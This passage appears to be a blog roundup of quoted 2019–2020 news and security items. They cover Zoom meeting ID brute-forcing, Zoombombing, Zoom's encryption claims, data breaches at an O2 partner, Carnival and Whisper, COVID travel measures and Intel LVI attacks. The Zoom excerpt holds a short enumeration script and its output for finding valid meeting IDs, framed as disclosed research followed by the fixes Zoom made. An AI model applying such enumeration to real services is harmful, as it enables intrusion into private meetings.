urls.append("https://zoom.us/j/{}".format(randint(100000000, 9999999999)))

But how could we determine if a Zoom Meeting ID represented a valid meeting or not? We discovered a fast and easy way to check this based on the following “div” element present in the HTML Body of the returned response, when accessing “Join Meeting” URL (https://zoom.us/j/{MEETING_ID})

<div id="join-errormsg" class="error"><i></i><span>Invalid meeting ID.</span></div&gt

I Found It!
We then tried to automate the described approach (just in case you don’t want to brute force all the Meeting IDs by hand):

for url in urls:
    yield MakeHTTPRequest(url=url, callback=parseResponse)

def MakeHTTPRequest(url, callback)
    …

def parseResponse(response):
    if response.css('div#join-errormsg').get() is None:
        print('Valid Meeting ID found: {}'.format(response.url))
    else:
        print('Invalid Meeting ID')

…and look at the output:

Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/22XXX41X8
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/8XXX34XXX9
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/93XXX9XXX5
Invalid Meeting ID
Invalid Meeting ID

Bingo!

Results
We were able to predict ~4% of randomly generated Meeting IDs, which is a very high chance of success, comparing to the pure brute force.

Mitigation

We contacted Zoom on July 22, 2019 as part of a responsible disclosure process and proposed the following mitigations:
1. Re-implement the generation algorithm of Meeting IDs
2. Replace the randomization function with a cryptographically strong one.
3.Increase the number of digits\symbols in the Meeting IDs.
4.Force hosts to use passwords\PINs\SSO for authorization purposes.

Zoom representatives were very collaborative and responded quickly to our emails. Here is the list of changes that were introduced to the Zoom client\infrastructure following our disclosure:

1. Passwords are added by default to all future scheduled meetings.
2. Users can able to add a password to already-scheduled future meetings and received instructions by email on how to do so. See article for instructions: https://support.zoom.us/hc/en-us/articles/360033331271-Account-Setting-Update-Password-Default-for-Meeting-and-Webinar
3. Password settings are enforceable at the account level and group level by the account admin.
4. Zoom will no longer automatically indicate if a meeting ID is valid or invalid. For each attempt, the page will load and attempt to join the meeting. Thus, a bad actor will not be able to quickly narrow the pool of meetings to attempt to join.
5. Repeated attempts to scan for meeting IDs will cause a device to be blocked for a period of time.

Source: Zoom-Zoom: We Are Watching You – Check Point Research

The FBI has issued a warning about video messaging service Zoom, and New York Attorney General’s office has made an inquiry into its cybersecurity practices, after a string of disturbing incidents involving takeovers of teleconferences.

Per Agence France-Presse, malicious individuals have been taking advantage of lax security and the surge in teleconferencing during the coronavirus pandemic to pull off a trick called “Zoombombing,” in which they can join any public meeting and use the app’s screen-sharing mode to broadcast whatever they want. All Zoom meetings are public by default, and as the Verge noted, the settings to restrict screen sharing to the host of a meeting (or turn it off after a meeting starts) are hidden under menus. This means that anyone who forgets to tweak these settings, which appears to be an awful lot of people, is vulnerable to Zoombombing.

Trolls have eagerly taken the opportunity to hijack Zoom meetings and broadcast pornography, slurs, and Nazi imagery to everything from religious institutions and corporate meetings to classrooms at schools. In one incident, someone took over a Chipotle meeting on Zoom featuring musician Lauv and promptly flooded it with hardcore porn. Zoom, which has experienced an explosion in downloads during the ongoing period of social distancing, has seemed caught off guard.

On Monday, the FBI’s Boston office issued a warning that it “has received multiple reports of conferences being disrupted by pornographic and/or hate images and threatening language. As individuals continue the transition to online lessons and meetings, the FBI recommends exercising due diligence and caution in your cybersecurity efforts.” In the warning, it noted one Massachusetts incident in which an individual joined an online high school classroom hosted on Zoom to yell profanities and reveal the teacher’s home address. Another school reported an incident to the FBI in which a man with “swastika tattoos” joined a meeting; the FBI told anyone who has had a Zoom call hijacked to contact its Internet Crime Complaint Center.

A spokesperson for the NY Attorney General’s office told AFP that they had sent a letter to Zoom “with a number of questions to ensure the company is taking appropriate steps to ensure users’ privacy and security.” The spokesperson added that they were “trying to work with the company” to prevent future incidents.

This isn’t the first time Zoom has come under scrutiny. On Tuesday, a report in the Intercept found that the service guarantees of end-to-end encryption for video meetings without a mobile device, but it actually uses transport encryption, allowing Zoom developers to access unencrypted audio and video content of meetings. (The Intercept noted that unlike Google, Facebook, and Microsoft, Zoom does not publish transparency reports on how many law enforcement requests for data it receives or how many it complies with.)

Zoom also recently pushed an update to nix code that sent analytics data to Facebook’s Graph API (even when Zoom users didn’t have an account on the social network) under a privacy policy that didn’t make the extent of the sharing clear. That is current the subject of a class action lawsuit, though whether or not the suit is viable is another question. Zoom also eventually caved last year and patched a “click-to-join” feature that installed insecure local web servers on Mac machines that weren’t deleted when the app was removed, allowing remote access to the webcams of any Mac that had current or previous installations of Zoom. The company had initially defended it as a convenience feature.

“We work 24 hours a day to ensure that hospitals, universities, schools and other companies can be connected and operational,” a Zoom spokesperson told AFP. “We appreciate the interest of the New York prosecutor in these matters and are happy to deliver the requested information.”

Source: FBI Issues Warning, NY Attorney General Makes Inquiry After Wave of Zoom Hijackings

Zoom, the video conferencing service whose use has spiked amid the Covid-19 pandemic, claims to implement end-to-end encryption, widely understood as the most private form of internet communication, protecting conversations from all outside parties. In fact, Zoom is using its own definition of the term, one that lets Zoom itself access unencrypted video and audio from meetings.

With millions of people around the world working from home in order to slow the spread of the coronavirus, business is booming for Zoom, bringing more attention on the company and its privacy practices, including a policy, later updated, that seemed to give the company permission to mine messages and files shared during meetings for the purpose of ad targeting.

Still, Zoom offers reliability, ease of use, and at least one very important security assurance: As long as you make sure everyone in a Zoom meeting connects using “computer audio” instead of calling in on a phone, the meeting is secured with end-to-end encryption, at least according to Zoom’s website, its security white paper, and the user interface within the app. But despite this misleading marketing, the service actually does not support end-to-end encryption for video and audio content, at least as the term is commonly understood. Instead it offers what is usually called transport encryption, explained further below.

When mousing over the green lock in the top left of the Zoom desktop app, it says, “Zoom is using an end to end encrypted connection”

Screenshot: The Intercept

In Zoom’s white paper, there is a list of “pre-meeting security capabilities” that are available to the meeting host that starts with “Enable an end-to-end (E2E) encrypted meeting.” Later in the white paper, it lists “Secure a meeting with E2E encryption” as an “in-meeting security capability” that’s available to meeting hosts. When a host starts a meeting with the “Require Encryption for 3rd Party Endpoints” setting enabled, participants see a green padlock that says, “Zoom is using an end to end encrypted connection” when they mouse over it.

But when reached for comment about whether video meetings are actually end-to-end encrypted, a Zoom spokesperson wrote, “Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection.”

The encryption that Zoom uses to protect meetings is TLS, the same technology that web servers use to secure HTTPS websites. This means that the connection between the Zoom app running on a user’s computer or phone and Zoom’s server is encrypted in the same way the connection between your web browser and this article (on https://theintercept.com) is encrypted. This is known as transport encryption, which is different from end-to-end encryption because the Zoom service itself can access the unencrypted video and audio content of Zoom meetings. So when you have a Zoom meeting, the video and audio content will stay private from anyone spying on your Wi-Fi, but it won’t stay private from the company. (In a statement, Zoom said it does not directly access, mine, or sell user data; more below.)

Source: Zoom Meetings Do Not Support End-to-End Encryption

Oh dear.

Hackers have slurped biz comms customers’ data from a database run by one of O2’s largest UK partners.

In an email sent to its customers, the partner, Aerial Direct, said that an unauthorised third party had been able to access customer data on 26 February through an external backup database, which included personal information on both current and expired subscribers from the last six years.

The data accessed included personal information, such as names, dates of birth, business addresses, email address, phone numbers, and product information. The company said no passwords or financial information was taken.

“As soon as we became aware of this unauthorised access we shut down access to the system and launched a full investigation, with assistance from experts, to determine what happened and what information was affected. We immediately reported this matter to the Information Commissioner’s Office and are actively working on fully exploring the details of how it happened.”

Source: Your data was ‘taken without permission’, customers told, after personal info accessed in O2 UK partner’s database • The Register

Earlier this month, the multibillion-dollar cruise conglomerate Carnival Corp. announced that two of its most popular lines—Holland America and Princess Cruises—were respectively slammed with hacks compromising the sensitive personal intel of cruise-goers and cruise-workers alike. Even though neither announcement makes mention of when each respective breach was disclosed, pulling up the source code for the Princess line’s disclosure reveals that the post happened midday on March 2—just as the U.S. began to learn of the country’s first deaths from covid-19—which is probably why the breach news slipped past most of our radars.

Per Carnival, its cruise companies were hit sometime between April and July of last year, when “an unsanctioned third party gained unauthorized access to some employee email accounts that contained personal information regarding our employees, crew, and guests.”

What kind of information did the “unsanctioned third party” access? All the bad types. Carnival offers a brief rundown:

The types of data potentially impacted varies by individual but can include: name, address, Social Security number, government identification number, such as passport number or driver’s license number, credit card and financial account information, and health-related information.

While neither cruise line has released any hard evidence of any of these details being misused (yet), Holland America’s notice makes sure to mention that guests should consider contacting the major credit bureaus in their respective countries to put fraud alerts on their credit reports. The line also offered to set people up with free credit monitoring and identity protection services to give their guests some “peace of mind.”

Source: Carnival Corp. Discloses Data Breach Amid Covid-19 Panic

Whisper, the secret-sharing app that called itself the “safest place on the Internet,” left years of users’ most intimate confessions exposed on the Web tied to their age, location and other details, raising alarm among cybersecurity researchers that users could have been unmasked or blackmailed.

The data exposure, discovered by independent researchers and shown to The Washington Post, allowed anyone to access all of the location data and other information tied to anonymous “whispers” posted to the popular social app, which has claimed hundreds of millions of users. The records were viewable on a non-password-protected database open to the public Web. A Post reporter was able to freely browse and search through the records, many of which involved children: A search of users who had listed their age as 15 returned 1.3 million results.

The cybersecurity consultants Matthew Porter and Dan Ehrlich, who lead the advisory group Twelve Security, said they were able to access nearly 900 million user records from the app’s release in 2012 to the present day. The researchers alerted federal law-enforcement officials and the company to the exposure.

Shortly after researchers and The Post contacted the company on Monday, access to the data was removed.

Source: 900 Million Secrets From 8 Years of ‘Whisper’ App Were Left Exposed Online – Slashdot

Federal regulators waived a rule Wednesday that was causing airlines to fly nearly empty planes just to avoid losing takeoff and landing rights at major airports.

The Federal Aviation Administration said it would suspend the rule through May 31 to help airlines that are canceling flights because of the new virus outbreak.

The FAA assigns takeoff and landing rights, or “slots,” at a few big, congested airports. Airlines must use 80% of their highly coveted slots or risk forfeiting them.

That FAA requirement — and especially a similar rule in Europe — led airlines to operate flights using those slots even if there were very few passengers.

The FAA’s decision affects flights at John F. Kennedy and LaGuardia airports in New York and Reagan Washington National Airport outside Washington, D.C.

The FAA said it also would not punish airlines that cancel flights through May 31 at four other airports where the agency approves schedules: Chicago’s O’Hare International Airport, Newark Liberty International Airport in New Jersey; Los Angeles International Airport and San Francisco International Airport.

The FAA waiver covers U.S. and foreign airlines. The agency’s announcement came a day after the European Commission promised to move quickly to waive its similar rule.

It could take weeks or even months for the European Commission to adopt the proposal, but it is likely to have immediate effect. It is a signal to airlines that they can stop flying mostly empty planes and still be confident that the emergency rules change will be approved before airport slots are allotted again.

Source: Rule Waiver Will Reduce Empty Planes During Virus Outbreak | Time

Donald Trump has suspended all travel to the US from Europe for 30 days to try and tackle the coronavirus crisis.

The draconian measures come into effect from midnight Friday, but do not apply to the United Kingdom. Trump revealed his plans in a rare Oval Office address on Wednesday night while criticizing the European Union for allowing the virus to take hold.

He said: ‘The European Union failed to take the same precautions (as the US) and restrict travel from China and other hotspots. As a result, a large number of new clusters in the United States were seeded by travelers from Europe.

‘After consulting with our top government health officials I have decided to take several strong but necessary actions to protect the health of all Americans. To stop new cases from entering our shores we will be suspending all travel from Europe to our shores for 30 days.’

Source: Donald Trump bans all travel from Europe to US for 30 days to stop coronavirus

Named Load Value Injection, or LVI for short, this is a new class of theoretical attacks against Intel CPUs.

While the attack has been deemed only a theoretical threat, Intel has released firmware patches to mitigate attacks against current CPUs, and fixes will be deployed at the hardware (silicon design) level in future generations.

A reverse Meltdown attack

To understand what an LVI attack is, users must first be aware of the Meltdown and Spectre attacks, and more particularly Meltdown.

Disclosed in January 2018, the Meltdown attack allowed an attacker running code on a CPU to read data from the CPU’s memory, while the CPU was processing “speculative” operations.

Speculative execution is a feature of all modern CPUs, one in which the CPU computes information in advance in an attempt to guess future results. The entire idea of speculative execution is to have the data ready for the CPU, if it ever needs it, and help improve the CPU’s speed and performance. Once data is not needed, it’s discarded. Meltdown and Spectre attacks target data while in this “transient” state, while waiting to be dismissed.

The Meltdown and Spectre attacks were groundbreaking when they were first revealed in 2018, showing a major flaw in the designs of modern CPUs.

Based on the original attacks, academics around the world later expanded the original research and discovered an entire class of so-called “transient attacks” that also leaked data from CPUs in their “transient” speculative execution states.

Besides Meltdown and Spectre, other transient attacks were eventually discovered during the past two years, including the likes of Foreshadow, Zombieload, RIDL, Fallout, and LazyFP.

LVI’s position in all these attacks is, technically, of a reverse-Meltdown. While the original Meltdown bug allowed attackers to read an app’s data from inside a CPU’s memory while in a transient state, LVI allows the attacker to inject code inside the CPU and have it executed as a transient “temporary” operation, giving attackers more control over what happens.

Tests performed by the two research teams — who found the LVI attack independently from one another — have been successful at proving the attack’s broad impact.

[…]

Current LVI attack demos rely on running malicious code on a computer, suggesting that local access is needed — such as delivering malicious code to the target via malware.

However, a remote attack is also possible via JavaScript, by tricking users into accessing a malicious site — similar to the original Meltdown attack, which could also be carried out via JavaScript.

[…]

While a change in the silicon design will eventually come with future CPUs, currently, Intel has prepared software-based mitigations, in the form of CPU firmware (microcode) updates.

However, according to preliminary tests, these mitigations come with a severe performance impacted that may slow down computations from 2 to 19 times, depending on the number of mitigations system administrators decide to apply to their CPUs.

Currently, many administrators are expected to skip these patches, primarily because of the severe performance impact.

Source: Intel CPUs vulnerable to new LVI attacks | ZDNet